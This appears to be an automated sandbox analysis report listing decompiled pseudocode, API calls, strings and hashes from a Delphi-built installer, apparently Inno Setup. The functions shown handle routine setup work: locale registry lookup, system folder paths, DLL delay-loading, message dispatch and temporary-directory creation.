                                                            • Opcode ID: 1e224452f98f28684b28cd542a9aef5b7292b81c784e0a64638696cbd7ae50c3
                                                            • Instruction ID: 9e47304f2c2519385998e5d426bc562542af73c677c294aaacd6cf1c30b33c32
                                                            • Opcode Fuzzy Hash: 1e224452f98f28684b28cd542a9aef5b7292b81c784e0a64638696cbd7ae50c3
                                                            • Instruction Fuzzy Hash: A2514472A0830D6EDB11EAF98D42FBE7BACBF1C705F1044AEF501E6681D6789D408B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E0040E2C4(char __eax, void* __ebx, void* __ecx, void* __edx) {
                                                            				char _v8;
                                                            				char* _v12;
                                                            				void* _v16;
                                                            				int _v20;
                                                            				short _v542;
                                                            				long _t51;
                                                            				long _t85;
                                                            				long _t87;
                                                            				long _t89;
                                                            				long _t91;
                                                            				long _t93;
                                                            				void* _t97;
                                                            				intOrPtr _t106;
                                                            				intOrPtr _t108;
                                                            				void* _t112;
                                                            				void* _t113;
                                                            				intOrPtr _t114;
                                                            
                                                            				_t112 = _t113;
                                                            				_t114 = _t113 + 0xfffffde4;
                                                            				_t97 = __edx;
                                                            				_v8 = __eax;
                                                            				E0040A2AC(_v8);
                                                            				_push(_t112);
                                                            				_push(0x40e4e9);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t114;
                                                            				if(_v8 != 0) {
                                                            					E0040DAF8( &_v542, E0040B278(_v8), 0x105);
                                                            				} else {
                                                            					GetModuleFileNameW(0,  &_v542, 0x105);
                                                            				}
                                                            				if(_v542 == 0) {
                                                            					L18:
                                                            					_pop(_t106);
                                                            					 *[fs:eax] = _t106;
                                                            					_push(E0040E4F0);
                                                            					return E0040A1C8( &_v8);
                                                            				} else {
                                                            					_v12 = 0;
                                                            					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            					if(_t51 == 0) {
                                                            						L10:
                                                            						_push(_t112);
                                                            						_push(0x40e4cc);
                                                            						_push( *[fs:eax]);
                                                            						 *[fs:eax] = _t114;
                                                            						E0040E0D4( &_v542, 0x105);
                                                            						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
                                                            							if(RegQueryValueExW(_v16, E0040E5DC, 0, 0, 0,  &_v20) == 0) {
                                                            								_v12 = E00406F0C(_v20);
                                                            								RegQueryValueExW(_v16, E0040E5DC, 0, 0, _v12,  &_v20);
                                                            								E0040B2DC(_t97, _v12);
                                                            							}
                                                            						} else {
                                                            							_v12 = E00406F0C(_v20);
                                                            							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
                                                            							E0040B2DC(_t97, _v12);
                                                            						}
                                                            						_pop(_t108);
                                                            						 *[fs:eax] = _t108;
                                                            						_push(E0040E4D3);
                                                            						if(_v12 != 0) {
                                                            							E00406F28(_v12);
                                                            						}
                                                            						return RegCloseKey(_v16);
                                                            					} else {
                                                            						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            						if(_t85 == 0) {
                                                            							goto L10;
                                                            						} else {
                                                            							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            							if(_t87 == 0) {
                                                            								goto L10;
                                                            							} else {
                                                            								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            								if(_t89 == 0) {
                                                            									goto L10;
                                                            								} else {
                                                            									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            									if(_t91 == 0) {
                                                            										goto L10;
                                                            									} else {
                                                            										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            										if(_t93 != 0) {
                                                            											goto L18;
                                                            										} else {
                                                            											goto L10;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}





















                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
                                                            • RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                            • API String ID: 2701450724-3496071916
                                                            • Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                            • Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
                                                            • Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                            • Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E006AC23C(void* __ebx, void* __edx, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				char _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				char _v56;
                                                            				char _v60;
                                                            				void* _t54;
                                                            				intOrPtr _t65;
                                                            				intOrPtr _t73;
                                                            				unsigned int _t77;
                                                            				void* _t80;
                                                            				char _t82;
                                                            				char _t84;
                                                            				intOrPtr _t89;
                                                            				intOrPtr _t94;
                                                            				intOrPtr _t99;
                                                            				intOrPtr _t112;
                                                            				intOrPtr _t118;
                                                            				void* _t129;
                                                            				intOrPtr _t158;
                                                            				intOrPtr _t163;
                                                            				intOrPtr _t165;
                                                            				intOrPtr _t167;
                                                            				intOrPtr _t174;
                                                            				intOrPtr _t182;
                                                            				intOrPtr _t183;
                                                            
                                                            				_t128 = __ebx;
                                                            				_t182 = _t183;
                                                            				_t129 = 7;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t129 = _t129 - 1;
                                                            					_t184 = _t129;
                                                            				} while (_t129 != 0);
                                                            				_push(_t182);
                                                            				_push(0x6ac586);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t183;
                                                            				E005C7430( &_v12);
                                                            				E0040A5A8(0x6d6534, _v12);
                                                            				E005C745C( &_v16);
                                                            				E0040A5A8(0x6d6538, _v16);
                                                            				E005C7488( &_v20, __esi, _t182, _t184);
                                                            				E0040A5A8(0x6d653c, _v20);
                                                            				E005C7530( *0x6d67dd & 0x000000ff, __ebx,  &_v24, __esi);
                                                            				E0040A5A8(0x6d6540, _v24);
                                                            				_t54 = E00429D18();
                                                            				_t185 = _t54 - 2;
                                                            				if(_t54 != 2) {
                                                            					E0040A1C8(0x6d6544);
                                                            				} else {
                                                            					E005C6D5C(L"SystemDrive", _t129,  &_v28, _t185);
                                                            					E0040A5A8(0x6d6544, _v28);
                                                            				}
                                                            				if( *0x6d6544 == 0) {
                                                            					_t118 =  *0x6d6534; // 0x0
                                                            					E005C53A0(_t118,  &_v32);
                                                            					E0040A5A8(0x6d6544, _v32);
                                                            					_t187 =  *0x6d6544;
                                                            					if( *0x6d6544 == 0) {
                                                            						E0040A5A8(0x6d6544, 0x6ac5c4);
                                                            					}
                                                            				}
                                                            				E006AC0D0(1, L"ProgramFilesDir", _t187); // executed
                                                            				E0040A5A8(0x6d6548, _v36);
                                                            				_t188 =  *0x6d6548;
                                                            				if( *0x6d6548 == 0) {
                                                            					_t174 =  *0x6d6544; // 0x0
                                                            					E0040B4C8(0x6d6548, L"\\Program Files", _t174);
                                                            				}
                                                            				E006AC0D0(1, L"CommonFilesDir", _t188); // executed
                                                            				E0040A5A8(0x6d654c, _v40);
                                                            				if( *0x6d654c == 0) {
                                                            					_t112 =  *0x6d6548; // 0x0
                                                            					E005C4EA4(_t112,  &_v44);
                                                            					E0040B4C8(0x6d654c, L"Common Files", _v44);
                                                            				}
                                                            				_t190 =  *0x6d67dd;
                                                            				if( *0x6d67dd != 0) {
                                                            					E006AC0D0(2, L"ProgramFilesDir", _t190); // executed
                                                            					E0040A5A8(0x6d6550, _v48);
                                                            					_t191 =  *0x6d6550;
                                                            					if( *0x6d6550 == 0) {
                                                            						E0060CD28(L"Failed to get path of 64-bit Program Files directory", _t128);
                                                            					}
                                                            					E006AC0D0(2, L"CommonFilesDir", _t191); // executed
                                                            					E0040A5A8(0x6d6554, _v52);
                                                            					if( *0x6d6554 == 0) {
                                                            						E0060CD28(L"Failed to get path of 64-bit Common Files directory", _t128);
                                                            					}
                                                            				}
                                                            				if( *0x6d68ac == 0) {
                                                            					L25:
                                                            					__eflags =  *0x6d67dc;
                                                            					if( *0x6d67dc == 0) {
                                                            						_t65 =  *0x6d6534; // 0x0
                                                            						E005C4EA4(_t65,  &_v60);
                                                            						E0040B4C8(0x6d6564, L"COMMAND.COM", _v60); // executed
                                                            					} else {
                                                            						_t73 =  *0x6d6538; // 0x0
                                                            						E005C4EA4(_t73,  &_v56);
                                                            						E0040B4C8(0x6d6564, L"cmd.exe", _v56);
                                                            					}
                                                            					E006AC180(); // executed
                                                            					__eflags = 0;
                                                            					_pop(_t158);
                                                            					 *[fs:eax] = _t158;
                                                            					_push(E006AC58D);
                                                            					return E0040A228( &_v60, 0xd);
                                                            				} else {
                                                            					_t77 =  *0x6d67f0; // 0xa0042ee
                                                            					if(_t77 >> 0x10 < 0x600) {
                                                            						goto L25;
                                                            					} else {
                                                            						_t80 =  *0x6d68ac(0x6cd7f4, 0x8000, 0,  &_v8); // executed
                                                            						if(_t80 != 0) {
                                                            							_t82 =  *0x6d68ac(0x6cd804, 0x8000, 0,  &_v8); // executed
                                                            							__eflags = _t82;
                                                            							if(_t82 != 0) {
                                                            								_t84 =  *0x6d68ac(0x6cd814, 0x8000, 0,  &_v8); // executed
                                                            								__eflags = _t84;
                                                            								if(_t84 != 0) {
                                                            									goto L25;
                                                            								} else {
                                                            									_push(_t182);
                                                            									_push(0x6ac516);
                                                            									_push( *[fs:eax]);
                                                            									 *[fs:eax] = _t183;
                                                            									E0040C8BC();
                                                            									__eflags = 0;
                                                            									_pop(_t163);
                                                            									 *[fs:eax] = _t163;
                                                            									_push(E006AC51D);
                                                            									_t89 = _v8;
                                                            									_push(_t89);
                                                            									L0043C214();
                                                            									return _t89;
                                                            								}
                                                            							} else {
                                                            								_push(_t182);
                                                            								_push(0x6ac4c3);
                                                            								_push( *[fs:eax]);
                                                            								 *[fs:eax] = _t183;
                                                            								E0040C8BC();
                                                            								__eflags = 0;
                                                            								_pop(_t165);
                                                            								 *[fs:eax] = _t165;
                                                            								_push(E006AC4CA);
                                                            								_t94 = _v8;
                                                            								_push(_t94);
                                                            								L0043C214();
                                                            								return _t94;
                                                            							}
                                                            						} else {
                                                            							_push(_t182);
                                                            							_push(0x6ac470);
                                                            							_push( *[fs:eax]);
                                                            							 *[fs:eax] = _t183;
                                                            							E0040C8BC();
                                                            							_pop(_t167);
                                                            							 *[fs:eax] = _t167;
                                                            							_push(E006AC477);
                                                            							_t99 = _v8;
                                                            							_push(_t99);
                                                            							L0043C214();
                                                            							return _t99;
                                                            						}
                                                            					}
                                                            				}
                                                            			}






































                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD7F4,00008000,00000000,?,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A), ref: 006AC434
                                                            • CoTaskMemFree.OLE32(?,006AC477,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC46A
                                                            • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                            • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                            • Instruction ID: b9958020655176fa4da1f40778f72373ecd7cbade583b9d7093994fb637c8e1d
                                                            • Opcode Fuzzy Hash: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                            • Instruction Fuzzy Hash: A281D530E012049FDB10FFA4E852BAD7BA7EB8A714F50447AF400A7395C678AD51CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E00410BF4(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                            				long _v8;
                                                            				signed int _v12;
                                                            				long _v16;
                                                            				void* _v20;
                                                            				long _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				struct HINSTANCE__** _v48;
                                                            				CHAR* _v52;
                                                            				void _v56;
                                                            				long _v60;
                                                            				_Unknown_base(*)()* _v64;
                                                            				struct HINSTANCE__* _v68;
                                                            				CHAR* _v72;
                                                            				signed int _v76;
                                                            				CHAR* _v80;
                                                            				intOrPtr* _v84;
                                                            				void* _v88;
                                                            				void _v92;
                                                            				signed int _t104;
                                                            				signed int _t106;
                                                            				signed int _t108;
                                                            				long _t113;
                                                            				intOrPtr* _t119;
                                                            				void* _t124;
                                                            				void _t126;
                                                            				long _t128;
                                                            				struct HINSTANCE__* _t133;
                                                            				struct HINSTANCE__* _t142;
                                                            				long _t166;
                                                            				signed int* _t190;
                                                            				_Unknown_base(*)()* _t191;
                                                            				void* _t194;
                                                            				intOrPtr _t196;
                                                            
                                                            				_push(_a4);
                                                            				memcpy( &_v56, 0x6c5c50, 8 << 2);
                                                            				_pop(_t194);
                                                            				_v56 =  *0x6c5c50;
                                                            				_v52 = E004110A4( *0x006C5C54);
                                                            				_v48 = E004110B4( *0x006C5C58);
                                                            				_v44 = E004110C4( *0x006C5C5C);
                                                            				_v40 = E004110D4( *0x006C5C60);
                                                            				_v36 = E004110D4( *0x006C5C64);
                                                            				_v32 = E004110D4( *0x006C5C68);
                                                            				_v28 =  *0x006C5C6C;
                                                            				memcpy( &_v92, 0x6c5c70, 9 << 2);
                                                            				_t196 = _t194;
                                                            				_v88 = 0x6c5c70;
                                                            				_v84 = _a8;
                                                            				_v80 = _v52;
                                                            				if((_v56 & 0x00000001) == 0) {
                                                            					_t166 =  *0x6c5c94; // 0x0
                                                            					_v8 = _t166;
                                                            					_v8 =  &_v92;
                                                            					RaiseException(0xc06d0057, 0, 1,  &_v8);
                                                            					return 0;
                                                            				}
                                                            				_t104 = _a8 - _v44;
                                                            				_t142 =  *_v48;
                                                            				if(_t104 < 0) {
                                                            					_t104 = _t104 + 3;
                                                            				}
                                                            				_v12 = _t104 >> 2;
                                                            				_t106 = _v12;
                                                            				_t190 = (_t106 << 2) + _v40;
                                                            				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
                                                            				_v76 = _t108;
                                                            				if(_t108 == 0) {
                                                            					_v72 =  *_t190 & 0x0000ffff;
                                                            				} else {
                                                            					_v72 = E004110E4( *_t190) + 2;
                                                            				}
                                                            				_t191 = 0;
                                                            				if( *0x6d2644 == 0) {
                                                            					L10:
                                                            					if(_t142 != 0) {
                                                            						L25:
                                                            						_v68 = _t142;
                                                            						if( *0x6d2644 != 0) {
                                                            							_t191 =  *0x6d2644(2,  &_v92);
                                                            						}
                                                            						if(_t191 != 0) {
                                                            							L36:
                                                            							if(_t191 == 0) {
                                                            								_v60 = GetLastError();
                                                            								if( *0x6d2648 != 0) {
                                                            									_t191 =  *0x6d2648(4,  &_v92);
                                                            								}
                                                            								if(_t191 == 0) {
                                                            									_t113 =  *0x6c5c9c; // 0x0
                                                            									_v24 = _t113;
                                                            									_v24 =  &_v92;
                                                            									RaiseException(0xc06d007f, 0, 1,  &_v24);
                                                            									_t191 = _v64;
                                                            								}
                                                            							}
                                                            							goto L41;
                                                            						} else {
                                                            							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
                                                            								L35:
                                                            								_t191 = GetProcAddress(_t142, _v72);
                                                            								goto L36;
                                                            							} else {
                                                            								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
                                                            								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
                                                            									goto L35;
                                                            								} else {
                                                            									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
                                                            									if(_t191 == 0) {
                                                            										goto L35;
                                                            									}
                                                            									L41:
                                                            									 *_a8 = _t191;
                                                            									goto L42;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					if( *0x6d2644 != 0) {
                                                            						_t142 =  *0x6d2644(1,  &_v92);
                                                            					}
                                                            					if(_t142 == 0) {
                                                            						_t133 = LoadLibraryA(_v80); // executed
                                                            						_t142 = _t133;
                                                            					}
                                                            					if(_t142 != 0) {
                                                            						L20:
                                                            						if(_t142 == E0041057C(_v48, _t142)) {
                                                            							FreeLibrary(_t142);
                                                            						} else {
                                                            							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
                                                            								_t124 = LocalAlloc(0x40, 8);
                                                            								_v20 = _t124;
                                                            								if(_t124 != 0) {
                                                            									 *((intOrPtr*)(_v20 + 4)) = _t196;
                                                            									_t126 =  *0x6c5c4c; // 0x0
                                                            									 *_v20 = _t126;
                                                            									 *0x6c5c4c = _v20;
                                                            								}
                                                            							}
                                                            						}
                                                            						goto L25;
                                                            					} else {
                                                            						_v60 = GetLastError();
                                                            						if( *0x6d2648 != 0) {
                                                            							_t142 =  *0x6d2648(3,  &_v92);
                                                            						}
                                                            						if(_t142 != 0) {
                                                            							goto L20;
                                                            						} else {
                                                            							_t128 =  *0x6c5c98; // 0x0
                                                            							_v16 = _t128;
                                                            							_v16 =  &_v92;
                                                            							RaiseException(0xc06d007e, 0, 1,  &_v16);
                                                            							return _v64;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t191 =  *0x6d2644(0,  &_v92);
                                                            					if(_t191 == 0) {
                                                            						goto L10;
                                                            					} else {
                                                            						L42:
                                                            						if( *0x6d2644 != 0) {
                                                            							_v60 = 0;
                                                            							_v68 = _t142;
                                                            							_v64 = _t191;
                                                            							 *0x6d2644(5,  &_v92);
                                                            						}
                                                            						return _t191;
                                                            					}
                                                            				}
                                                            			}









































                                                            APIs
                                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID: P\l$p\l
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E005B85F0(void* __eax, void* __ecx, struct tagMSG* __edx) {
                                                            				char _v19;
                                                            				int _t10;
                                                            				char _t12;
                                                            				int _t13;
                                                            				void* _t14;
                                                            				int _t30;
                                                            				int _t32;
                                                            				MSG* _t43;
                                                            				void* _t44;
                                                            				char* _t46;
                                                            
                                                            				_t43 = __edx;
                                                            				_t44 = __eax;
                                                            				_t32 = 0;
                                                            				_t10 = PeekMessageW(__edx, 0, 0, 0, 0); // executed
                                                            				if(_t10 != 0) {
                                                            					_v19 = _t12;
                                                            					if(_v19 == 0) {
                                                            						_t13 = PeekMessageA(_t43, 0, 0, 0, 1);
                                                            						asm("sbb eax, eax");
                                                            						_t14 = _t13 + 1;
                                                            					} else {
                                                            						_t30 = PeekMessageW(_t43, 0, 0, 0, 1);
                                                            						asm("sbb eax, eax");
                                                            						_t14 = _t30 + 1;
                                                            					}
                                                            					if(_t14 != 0) {
                                                            						_t32 = 1;
                                                            						if(_t43->message == 0x12) {
                                                            							 *((char*)(_t44 + 0xbc)) = 1;
                                                            						} else {
                                                            							 *_t46 = 0;
                                                            							if( *((short*)(_t44 + 0x122)) != 0) {
                                                            								 *((intOrPtr*)(_t44 + 0x120))();
                                                            							}
                                                            							if(E005BA368(_t44, _t43) == 0 && E005B8488(_t44, _t43) == 0 &&  *_t46 == 0 && E005B8340(_t44, _t43) == 0 && E005B8390(_t44, _t43) == 0 && E005B82F8(_t44, _t43) == 0) {
                                                            								TranslateMessage(_t43);
                                                            								if(_v19 == 0) {
                                                            									DispatchMessageA(_t43);
                                                            								} else {
                                                            									DispatchMessageW(_t43); // executed
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t32;
                                                            			}














                                                            APIs
                                                            • PeekMessageW.USER32 ref: 005B8604
                                                            • IsWindowUnicode.USER32 ref: 005B8618
                                                            • PeekMessageW.USER32 ref: 005B863B
                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005B8651
                                                            • TranslateMessage.USER32 ref: 005B86D6
                                                            • DispatchMessageW.USER32 ref: 005B86E3
                                                            • DispatchMessageA.USER32 ref: 005B86EB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                            • String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E006AC8CC(long __ebx, void* __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				intOrPtr _v40;
                                                            				char _v44;
                                                            				char _v48;
                                                            				char _v52;
                                                            				char _v56;
                                                            				char* _t40;
                                                            				intOrPtr _t41;
                                                            				int _t47;
                                                            				intOrPtr _t77;
                                                            				void* _t80;
                                                            				intOrPtr _t81;
                                                            				intOrPtr _t94;
                                                            				intOrPtr _t107;
                                                            				intOrPtr _t108;
                                                            
                                                            				_t105 = __esi;
                                                            				_t104 = __edi;
                                                            				_t79 = __ebx;
                                                            				_t107 = _t108;
                                                            				_t80 = 6;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t80 = _t80 - 1;
                                                            				} while (_t80 != 0);
                                                            				_push(_t80);
                                                            				_push(__ebx);
                                                            				_push(_t107);
                                                            				_push(0x6aca22);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t108;
                                                            				E0060D530( &_v20, __ebx, __edx, __edi, __esi); // executed
                                                            				E0040A5A8(0x6d6530, _v20);
                                                            				_t81 =  *0x6d6530; // 0x0
                                                            				E0040B4C8( &_v24, _t81, L"Created temporary directory: ");
                                                            				E00616130(_v24, _t79, __edi, __esi);
                                                            				_t40 =  *0x6cdfdc; // 0x6d62e4
                                                            				if( *_t40 != 0) {
                                                            					_t77 =  *0x6d6530; // 0x0
                                                            					E0061583C(_t77);
                                                            				}
                                                            				_t41 =  *0x6d6530; // 0x0
                                                            				E005C4EA4(_t41,  &_v28);
                                                            				E0040B4C8( &_v8, L"_isetup", _v28);
                                                            				_t47 = CreateDirectoryW(E0040B278(_v8), 0); // executed
                                                            				if(_t47 == 0) {
                                                            					_t79 = GetLastError();
                                                            					E005CD508(0x3d,  &_v48, _v8);
                                                            					_v44 = _v48;
                                                            					E0042302C( &_v52, _t61, 0);
                                                            					_v40 = _v52;
                                                            					E005C857C(_t79,  &_v56);
                                                            					_v36 = _v56;
                                                            					E005CD4D8(0x81, 2,  &_v44,  &_v32);
                                                            					E00429008(_v32, 1);
                                                            					E004098C4();
                                                            				}
                                                            				E0062554C( &_v12);
                                                            				_t113 = _v12;
                                                            				if(_v12 != 0) {
                                                            					E0040B4C8( &_v16, L"\\_setup64.tmp", _v8);
                                                            					E006AC874(_v12, _t79, _v16, _t104, _t105, _t113); // executed
                                                            					E006255A4(_v16);
                                                            				}
                                                            				_pop(_t94);
                                                            				 *[fs:eax] = _t94;
                                                            				_push(E006ACA29);
                                                            				E0040A228( &_v56, 3);
                                                            				return E0040A228( &_v32, 7);
                                                            			}


























                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC957
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC960
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: Created temporary directory: $\_setup64.tmp$_isetup$bm
                                                            • API String ID: 1375471231-4222912607
                                                            • Opcode ID: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
                                                            • Instruction ID: fab29f73b12df9647497e51388a78cad5e0a4b86d3a417c00642db4583a337af
                                                            • Opcode Fuzzy Hash: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
                                                            • Instruction Fuzzy Hash: 00412E34A102099BDB01FBA4D891AEEB7B6FF89704F50417AF501B7391DA34AE458B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
                                                            			E005C92C8(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				void* _t10;
                                                            				intOrPtr _t17;
                                                            				intOrPtr _t24;
                                                            				intOrPtr* _t27;
                                                            				struct HWND__* _t33;
                                                            				void* _t42;
                                                            				intOrPtr _t44;
                                                            				void* _t49;
                                                            				intOrPtr _t51;
                                                            				struct HWND__* _t52;
                                                            				intOrPtr _t54;
                                                            				intOrPtr _t55;
                                                            
                                                            				_t50 = __esi;
                                                            				_t42 = __edx;
                                                            				_t54 = _t55;
                                                            				_push(0);
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				if(__edx != 0) {
                                                            					_t55 = _t55 + 0xfffffff0;
                                                            					_t10 = E00408A40(_t10, _t54);
                                                            				}
                                                            				_t49 = _t10;
                                                            				_push(_t54);
                                                            				_push(0x5c93da);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t55;
                                                            				E00408414(0);
                                                            				 *((intOrPtr*)(_t49 + 0xc)) = GetActiveWindow();
                                                            				 *((intOrPtr*)(_t49 + 0x10)) = GetFocus();
                                                            				_t17 = E005ABB4C(0, _t42, _t49, _t50); // executed
                                                            				 *((intOrPtr*)(_t49 + 0x14)) = _t17;
                                                            				if( *0x6d5822 == 0) {
                                                            					 *0x6d5822 = RegisterClassW(0x6ccd0c);
                                                            				}
